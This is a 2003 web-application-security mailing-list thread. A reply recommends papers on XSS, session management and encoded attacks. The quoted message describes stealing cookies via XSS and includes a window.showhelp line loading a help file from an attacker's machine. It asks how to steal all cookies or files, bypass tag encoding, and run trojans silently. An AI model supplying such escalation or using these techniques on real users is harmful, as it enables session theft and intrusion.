RE: Proof of Concept Tool on Web Application Security

["Gunter" <gunter () technicalinfo net>]

There aare a number of papers online at www.technicalinfo.net that will
help you here and shed a little more light on the situation.

HTML Code Injection and Cross site scripting
(http://www.technicalinfo.net/papers/CSS.html)   
-- How it works, how to detect, and how to protect against it.

Web Based Session Management
(http://www.technicalinfo.net/papers/WebBasedSessionManagement.html)    
-- All about session management - understanding the good, the bad, and
the ugly.


URL Encoded Attacks
(http://www.technicalinfo.net/papers/URLEmbeddedAttacks.html)   
-- Understanding how different encoding schema work and alternative
representations (incl. bypassing < conversions etc.)


Hope that helps...





-----Original Message-----
From: Indian Tiger [mailto:indiantiger () mailandnews com] 
Sent: 18 April 2003 13:55
To: webappsec () securityfocus com
Subject: RE: Proof of Concept Tool on Web Application Security


Hey Everybody,

First of all thank you very much to Robert, Rogan, Steve, Nicolas and
Leah for 
their guidance to test XSS and Session ID brute force attack.

Now I can transfer victim's cookie to another location successfully. I
have 
tested XSS to transfer cookie using following three ways:
1. Using  document.location
2. Using Image src
3. Using hidden fields

The cookie, which I am getting, is of current application only. Now how
can I 
steal all cookies stored on the victim's machine? or how to transfer a
file 
from Victim machine?.

Some sites converts < and > tags into &lt; and &gt; to protect them
selves 
from XSS attacks. Is there any way to bypass this protection?

I was testing some trojan execution using XSS. In this process I was
able to 
run help file 31users.chm from attackers machine to victims machine as 
follows:
window.showhelp(file:///XXX. XXX. XXX. XXX/c:/windows/help/31users.chm)
Is it possible to run some trojan or activex componenet instead of help
file? 
Without alerting for any pop-up.
Is this possible to write some malicious help file? (These files not
even ask 
before execution.)

As per IDefence's Article on "Brute forcing Session ID" some time
session ID 
is random.  I have tested this against six sites and I was not much
lucky to 
get session IDs in which only last 3-4 digits are changing. What do you
think in practice still are they so? Since iDEFENSE has published 
this research in Nov 2001 and current scenario might be a bit changed.

In my research of six sites, four sites were using ASP session variable
to 
generated session ID and remaining two their own.

I was able to hijack ASP sessions using session IDs. In my testing,
first I 
have logged in as user1, got his session ID and using user1's session
ID, I 
was able to hijack user1.

Any help on this would be highly appreciated.

Thanking You.
Sincerely,

Indian Tiger, CISSP